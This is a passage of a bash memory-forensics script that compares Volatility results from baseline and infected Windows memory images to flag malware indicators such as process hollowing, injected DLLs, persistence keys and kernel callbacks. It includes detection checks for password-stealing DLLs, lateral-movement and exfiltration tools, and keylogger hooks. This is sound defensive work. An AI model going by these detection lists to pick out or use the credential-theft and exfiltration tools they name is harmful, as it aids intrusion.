      if ! grep -E "^$ppid$" $output_dir/tmpfolder/ppids/pids.temp > /dev/null ; then
        tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 2,3,4 | grep -E " $ppid$" | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppids/processes-$ppid.temp
        cat $output_dir/tmpfolder/ppids/processes-$ppid.temp | tr '\n' ' ' > $output_dir/tmpfolder/ppids/processes-$ppid-space.temp
        if  ! grep -E -i "explorer.exe|csrss.exe|wininit.exe|winlogon.exe" $output_dir/tmpfolder/ppids/processes-$ppid-space.temp > /dev/null ; then 
          echo -e "\n\nPPID $ppid does not have an associated process." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi 
      fi
    done < $output_dir/tmpfolder/ppids/ppids.temp

    # verify processes are running in expected sessions:
    for process in " wininit.exe" " services.exe" " lsass.exe" " svchost.exe" " lsm.exe" " winlogon.exe" ; do
      if [[ $process = " csrss.exe" ]] || [[ $process = " wininit.exe" ]] || [[ $process = " services.exe" ]] || [[ $process = " lsass.exe" ]] || [[ $process = " svchost.exe" ]]|| [[ $process = " lsm.exe" ]]; then session="0" ; fi
      if [[ $process = " winlogon.exe" ]]; then session="1" ; fi
      cat $output_dir/pslist/infected-pslist.txt | grep $process | tr -s ' ' | cut -d ' ' -f 7 > $output_dir/tmpfolder/process_sessions.tmp
      while read psession ; do
        if [[ $psession != $session ]] ; then
          echo -e "\n\nProcess$process running in unexpected session ($psession instead of $session)." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/pslist/infected-pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/pslist/infected-pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/pslist/infected-pslist.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/process_sessions.tmp
    done

    # check process executable path:
    # expected image path for each core process (compared case-insensitively against the dlllist command line):
    for process in "smss.exe" "csrss.exe" "wininit.exe" "services.exe" "lsass.exe" "svchost.exe" "lsm.exe" "explorer.exe" "winlogon.exe" "sppsvc.exe"; do
      if [[ $process == "smss.exe" ]]; then processpath="\systemroot\system32\smss.exe" ; fi
      if [[ $process == "csrss.exe" ]]; then processpath="\windows\system32\csrss.exe" ; fi
      if [[ $process == "wininit.exe" ]]; then processpath="\windows\system32\wininit.exe" ; fi
      if [[ $process == "services.exe" ]]; then processpath="\windows\system32\services.exe" ; fi
      if [[ $process == "lsass.exe" ]]; then processpath="\windows\system32\lsass.exe" ; fi
      if [[ $process == "svchost.exe" ]]; then processpath="\windows\system32\svchost.exe" ; fi
      if [[ $process == "lsm.exe" ]]; then processpath="\windows\system32\lsm.exe" ; fi
      if [[ $process == "explorer.exe" ]]; then processpath="\windows\explorer.exe" ; fi
      if [[ $process == "winlogon.exe" ]]; then processpath="\windows\system32\winlogon.exe" ; fi
      if [[ $process == "sppsvc.exe" ]]; then processpath="\windows\system32\sppsvc.exe" ; fi
      cat $output_dir/dlllist/infected-dlllist.txt | grep -i -A 1 $process | grep "Command line" | grep -o '\\.*' | cut -d ' ' -f 1 | tr '[:upper:]' '[:lower:]' | sed 's,\\,\\\\,g' > $output_dir/tmpfolder/path_list.tmp
      if [[ -s $output_dir/tmpfolder/path_list.tmp ]]; then
        while read path; do
          if [[ "$path" != "$processpath" ]]; then
            echo -e "\n\nProcess running from unusual path." >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "Process $process is running from $path instead of $processpath" >> $output_dir/tmpfolder/malware-checks.tmp
          fi
        done < $output_dir/tmpfolder/path_list.tmp
      fi
    done

    # verify if any processes have suspicious l33t names:
    cat $output_dir/psscan/infected-psscan.txt | grep -E -i $l33t_process_name > $output_dir/tmpfolder/suspicious_process.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_process.tmp ]]; then
      echo -e "\n\nProcesses with suspicious names." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_process.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # verify if any hacker tools were used in process list:
    cat $output_dir/psscan/infected-psscan.txt | grep -E -i $hacker_process_regex > $output_dir/tmpfolder/suspicious_tools.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_tools.tmp ]]; then
      echo -e "\n\nProcesses that may have been used for lateral movement, exfiltration etc." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_tools.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # detect process hollowing:
    mkdir $output_dir/tmpfolder/hollowing
    vol.py --profile=$profile -f $infected_memory_image procdump -u -D $output_dir/tmpfolder/hollowing/ &> /dev/null
    cat $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 2 | cut -d '.' -f 1 | sort | uniq > $output_dir/tmpfolder/process-names.tmp
    tail -n +4 $output_dir/tmpfolder/process-names.tmp > $output_dir/tmpfolder/procnames.tmp
    while read process ; do
      cat $output_dir/psscan/infected-psscan.txt | grep -i $process | tr -s ' ' | cut -d ' ' -f 3 > $output_dir/tmpfolder/$process-pids.tmp
      touch $output_dir/tmpfolder/$process-size.tmp
      while read pid ; do
        ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1 >> $output_dir/tmpfolder/$process-size.tmp
      done < $output_dir/tmpfolder/$process-pids.tmp
      cat $output_dir/tmpfolder/$process-size.tmp | uniq > $output_dir/tmpfolder/$process-size-uniq.tmp
      lines=$(wc -l < $output_dir/tmpfolder/$process-size-uniq.tmp)
      if [[ $lines != 1 ]] && [[ $lines != 0 ]]  ; then 
        echo -e "\n\nPotential process hollowing detected in $process (based on size)." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "Process    PID  Size" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "-----------------------------------" >> $output_dir/tmpfolder/malware-checks.tmp
        while read pid ; do
          echo -e "$process    $pid  `ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1`" >> $output_dir/tmpfolder/malware-checks.tmp
        done < $output_dir/tmpfolder/$process-pids.tmp   
      fi
    done < $output_dir/tmpfolder/procnames.tmp

    # detect processes with exit time but active threads:
    cat $output_dir/psxview/diff-psxview.txt | tr -s ' ' | cut -d ' ' -f 1,2,6,13 | grep "UTC" | grep "True" | cut -d ' ' -f 1 > $output_dir/tmpfolder/exit_with_threads.tmp
    if [[ -s $output_dir/tmpfolder/exit_with_threads.tmp ]]; then
      echo -e "\n\nProcess(es) with exit time and active threads running." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psxview/infected-psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psxview/infected-psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      while read procname ; do 
        cat $output_dir/psxview/diff-psxview.txt | grep $procname >> $output_dir/tmpfolder/malware-checks.tmp
      done < $output_dir/tmpfolder/exit_with_threads.tmp
    fi

    # check if any process has domain or enterprise admin privileges:
    cat $output_dir/getsids/diff-getsids.txt | egrep '(Domain Admin|Enterprise Admin|Schema Admin)' > $output_dir/tmpfolder/suspicious_privlege.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_privlege.tmp ]]; then
      echo -e "\n\nProcess(es) with domain or enterprise admin privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_privlege.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has debug privileges:
    cat $output_dir/privs/diff-privs.txt | grep -i "debug" > $output_dir/tmpfolder/debug_privs.tmp
    if [[ -s $output_dir/tmpfolder/debug_privs.tmp ]]; then
      echo -e "\n\nProcess(es) with debug privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/privs/infected-privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/privs/infected-privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/debug_privs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a raw socket handle:
    cat $output_dir/handles/diff-handles.txt | grep -F "\Device\RawIp" > $output_dir/tmpfolder/raw_socket.tmp
    if [[ -s $output_dir/tmpfolder/raw_socket.tmp ]]; then
      echo -e "\n\nRaw socket handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/raw_socket.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a handle to a remote mapped share:
    # -E is required here: the alternation (LanmanRedirector|Mup) is a regex, not a fixed string
    cat $output_dir/handles/diff-handles.txt | grep -E "\\\\Device\\\\(LanmanRedirector|Mup)" > $output_dir/tmpfolder/remote_shares.tmp
    if [[ -s $output_dir/tmpfolder/remote_shares.tmp ]]; then
      echo -e "\n\nRemote share handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/infected-handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/remote_shares.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - DLLs ################################

    # find suspicious new DLLs (dlllist):
    cat $output_dir/dlllist/diff-dlllist.txt | grep -o -E "C:.*.dll" | grep -v -i "System32" | uniq | sort > $output_dir/tmpfolder/dlls.tmp
    if [[ -s $output_dir/tmpfolder/dlls.tmp ]] ; then
      echo -e "\n\nNew DLLs (dlllist)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/dlls.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find new dlls (atoms):
    cat $output_dir/atoms/diff-atoms.txt | grep -i -E ".dll$"  >> $output_dir/tmpfolder/atoms.tmp
    if [[ -s $output_dir/tmpfolder/atoms.tmp ]] ; then
      echo -e "\n\nNew DLLs (atoms)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atoms/infected-atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atoms/infected-atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atoms.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find new dlls (atomscan):
    cat $output_dir/atomscan/diff-atomscan.txt | grep -i -E ".dll$"  >> $output_dir/tmpfolder/atomscan.tmp
    if [[ -s $output_dir/tmpfolder/atomscan.tmp ]] ; then
      echo -e "\n\nNew DLLs (atomscan)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atomscan/infected-atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atomscan/infected-atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atomscan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: The DLLs above were potentially injected to genuine processes." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # highlight new hidden DLLs (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep "False" | grep -E -v -i "system32|explorer.exe|iexplore.exe|.fon$" | sort | uniq > $output_dir/tmpfolder/ldrmodules.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodules.tmp ]] ; then
      echo -e "\n\nSuspicious new ldrmodules entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodules.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find highly suspicious DLLs used for password stealing (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep -E -i $hacker_dll_regex | sort | uniq > $output_dir/tmpfolder/ldrmodule_hacker.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hacker.tmp ]] ; then
      echo -e "\n\nNew DLLs that may have been used for password theft." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hacker.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find DLLs with no path / no name (indicates process hollowing) (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep -E -i "no name" | sort | uniq > $output_dir/tmpfolder/ldrmodule_hollow.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hollow.tmp ]] ; then
      echo -e "\n\nNew DLLs with no path/name (indicates process hollowing)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hollow.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - FILES ################################

    # find DLLs/EXES loaded from temp folders (dlllist):
    cat $output_dir/dlllist/diff-dlllist.txt | grep -E -i "TMP|TEMP|AppData" | sort | uniq > $output_dir/tmpfolder/dlllist_temp.tmp
    if [[ -s $output_dir/tmpfolder/dlllist_temp.tmp ]] ; then
      echo -e "\n\nNew DLLs/EXEs loaded from temp folders." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/dlllist_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hidden DLLs/EXES (ldrmodules):
    cat $output_dir/ldrmodules/diff-ldrmodules.txt | grep -E -i "False  False  False" | sort | uniq | grep -E -i ".dll$|.exe$" > $output_dir/tmpfolder/ldrmodule_hidden.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hidden.tmp ]] ; then
      echo -e "\n\nNew hidden DLLs/EXEs (ldrmodules)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/infected-ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hidden.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight new suspicious files (filescan):
    cat $output_dir/filescan/diff-filescan.txt | grep -E -i "\\ProgramData|\\Recycle|\\Windows\\Temp|\\Users\\All|\\Users\\Default|\\Users\\Public|\\ProgramData|AppData" | sort | uniq | grep -v -E ".db$|.lnk$|.ini$|.log$" | tr -s ' ' | cut -d ' ' -f 5 | sort | uniq >> $output_dir/tmpfolder/filescan.tmp
    if [[ -s $output_dir/tmpfolder/filescan.tmp ]] ; then
      echo -e "\n\nNew files on disk." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/filescan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight prefetch files:
    cat $output_dir/mftparser/diff-mftparser.txt | grep '\.pf$' | awk '{print $NF}' | sort | uniq > $output_dir/tmpfolder/prefetch.tmp
    if [[ -s $output_dir/tmpfolder/prefetch.tmp ]]; then
      echo -e "\n\nNew prefetch artifacts." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/prefetch.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight binaries loaded from TEMP folders:
    cat $output_dir/envars/diff-envars.txt | grep -i "TEMP" > $output_dir/tmpfolder/temp_envars.tmp
    if [[ -s $output_dir/tmpfolder/temp_envars.tmp ]]; then
      echo -e "\n\nPossible binaries loaded from TEMP folders." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/envars/infected-envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/envars/infected-envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/temp_envars.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find suspicious new executables (dlllist):
    cat $output_dir/dlllist/diff-dlllist.txt | grep "Command line" | grep -E -v -i "system32|explorer.exe|iexplore.exe" | sed -e 's/Command line : //' | sort | uniq > $output_dir/tmpfolder/execs.tmp
    if [[ -s $output_dir/tmpfolder/execs.tmp ]] ; then
      echo -e "\n\nNew executables (dlllist)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/execs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight alternate data stream files:
    cat $output_dir/mftparser/diff-mftparser.txt | grep "DATA ADS" > $output_dir/tmpfolder/ads.tmp
    if [[ -s $output_dir/tmpfolder/ads.tmp ]]; then
      echo -e "\n\nNew alternate Data Stream (ADS) files." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - MISC ################################

    # find interesting new entries in the hosts file
    mkdir $output_dir/tmpfolder/hostsb
    mkdir $output_dir/tmpfolder/hostsi
    qaddressb=$(cat $output_dir/filescan/baseline-filescan.txt | grep -i -E "etc\\\\hosts$" | tr -s ' ' | cut -d ' ' -f 1)
    if [[ ! -z "$qaddressb" ]] ; then 
      vol.py --profile=$profile -f $baseline_memory_image dumpfiles -Q $qaddressb -D $output_dir/tmpfolder/hostsb --name &> /dev/null 
      strings $output_dir/tmpfolder/hostsb/* > $output_dir/tmpfolder/hosts_baseline.tmp  &> /dev/null
    fi
    qaddressi=$(cat $output_dir/filescan/infected-filescan.txt | grep -i -E "etc\\\\hosts$" | tr -s ' ' | cut -d ' ' -f 1)
    if [[ ! -z "$qaddressi" ]] ; then 
      vol.py --profile=$profile -f $infected_memory_image dumpfiles -Q $qaddressi -D $output_dir/tmpfolder/hostsi --name &> /dev/null 
      strings $output_dir/tmpfolder/hostsi/* > $output_dir/tmpfolder/hosts_infected.tmp  &> /dev/null
    fi
    if [[ -s $output_dir/tmpfolder/hosts_baseline.tmp ]] && [[ -s $output_dir/tmpfolder/hosts_infected.tmp ]] ; then
      diff $output_dir/tmpfolder/hosts_baseline.tmp $output_dir/tmpfolder/hosts_infected.tmp | grep -E "^>" | sed 's/^..//' &> $output_dir/tmpfolder/new-hosts.tmp
      if [[ -s $output_dir/tmpfolder/new-hosts.tmp ]] ; then
        echo -e "\n\nChanges in hosts files." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/new-hosts.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi
    
    # find suspicious new desktop instances: 
    cat $output_dir/deskscan/diff-deskscan.txt | grep "Desktop:" >> $output_dir/tmpfolder/deskscan.tmp
    if [[ -s $output_dir/tmpfolder/deskscan.tmp ]] ; then
      echo -e "\n\nNew desktop instances." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/deskscan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
            echo -e "\nHint: Use wintree to view a tree of the windows in suspicious desktops." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    ################################ MALWARE CHECKS - PERSISTENCE ################################

    echo -e "Searching for persistence artifacts..."

    # filtering svcscan results:
    cat $output_dir/svcscan/baseline-svcscan.txt | grep -i "Binary Path" | sort | uniq > $output_dir/tmpfolder/baseline-svcscan.tmp
    cat $output_dir/svcscan/infected-svcscan.txt | grep -i "Binary Path" | sort | uniq > $output_dir/tmpfolder/infected-svcscan.tmp
    diff $output_dir/tmpfolder/baseline-svcscan.tmp $output_dir/tmpfolder/infected-svcscan.tmp | grep -E "^>" | sed 's/^..//' > $output_dir/tmpfolder/diff-svcscan.tmp
    if [[ -s $output_dir/tmpfolder/diff-svcscan.tmp ]] ; then
      echo -e "\n\nNew services." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      # match each new "Binary Path" line literally (-F), so backslashes in Windows paths need no escaping,
      # and pull the 9 preceding lines (the full svcscan record for that service) into the report
      while IFS= read -r line ; do
        grep -F -B 9 -- "$line" $output_dir/svcscan/infected-svcscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      done < $output_dir/tmpfolder/diff-svcscan.tmp
    fi

    # find changes in registry keys commonly used for persistence:
    for key in "Microsoft\Windows\CurrentVersion\RunOnce" "Microsoft\Windows\CurrentVersion\Run" "Software\Microsoft\Windows\CurrentVersion\RunOnce" "Software\Microsoft\Windows\CurrentVersion\Run" "Microsoft\Windows\CurrentVersion\RunServices" "Microsoft\Windows\CurrentVersion\RunServicesOnce" "Software\Microsoft\Windows NT\CurrentVersion\Winlogon" "Microsoft\Security Center\Svc" ; do
      vol.py --profile=$profile -f $baseline_memory_image printkey -K $key &> $output_dir/tmpfolder/base.tmp &
      vol.py --profile=$profile -f $infected_memory_image printkey -K $key &> $output_dir/tmpfolder/inf.tmp &
      wait
      tr < $output_dir/tmpfolder/base.tmp -d '\000' > $output_dir/tmpfolder/baseline.tmp
      tr < $output_dir/tmpfolder/inf.tmp -d '\000' > $output_dir/tmpfolder/infected.tmp
      diff $output_dir/tmpfolder/baseline.tmp $output_dir/tmpfolder/infected.tmp | grep -E "^>" | sed 's/^..//' &> $output_dir/tmpfolder/diff.tmp
      if [[ -s $output_dir/tmpfolder/diff.tmp ]] ; then
        echo -e "\n\nRegistry key $key changed." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        tail -n +2 $output_dir/tmpfolder/infected.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    ################################ MALWARE CHECKS - KERNEL ################################

    # find keylogger traces in messagehooks:
    cat $output_dir/messagehooks/diff-messagehooks.txt | grep -i "KEYBOARD" > $output_dir/tmpfolder/keyboard_messagehooks.tmp
    if [[ -s $output_dir/tmpfolder/keyboard_messagehooks.tmp ]]; then
      echo -e "\n\nKeylogger traces (messagehooks)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/messagehooks/infected-messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/messagehooks/infected-messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/keyboard_messagehooks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unusual new timers:
    cat $output_dir/timers/diff-timers.txt | grep -E -v -i "ataport.SYS|ntoskrnl.exe|NETIO.SYS|storport.sys|afd.sys|cng.sys|dfsc.sys|discache.sys|HTTP.sys|luafv.sys|ndis.sys|Ntfs.sys|rdbss.sys|rdyboost.sys|spsys.sys|srvnet.sys|srv.sys|tcpip.sys|usbccgp.sys" | sort | uniq >> $output_dir/tmpfolder/timers.tmp
    if [[ -s $output_dir/tmpfolder/timers.tmp ]] ; then
      echo -e "\n\nNew timers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set kernel timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find unusual new gditimers:
    cat $output_dir/gditimers/diff-gditimers.txt | grep -E -v -i "dllhost.exe|explorer.exe|csrss.exe" | sort | uniq >> $output_dir/tmpfolder/gditimers.tmp
    if [[ -s $output_dir/tmpfolder/gditimers.tmp ]] ; then
      echo -e "\n\nNew gditimers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/gditimers/infected-gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/gditimers/infected-gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/gditimers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find malicious kernel timers:
    cat $output_dir/timers/diff-timers.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_timers.tmp
    if [[ -s $output_dir/tmpfolder/unknown_timers.tmp ]]; then
      echo -e "\n\nNew malicious kernel timers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/infected-timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find malicious kernel callbacks:
    cat $output_dir/callbacks/diff-callbacks.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_callbacks.tmp
    if [[ -s $output_dir/tmpfolder/unknown_callbacks.tmp ]]; then
      echo -e "\n\nNew malicious kernel callbacks." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/callbacks/infected-callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/callbacks/infected-callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_callbacks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown drivermodule entries:
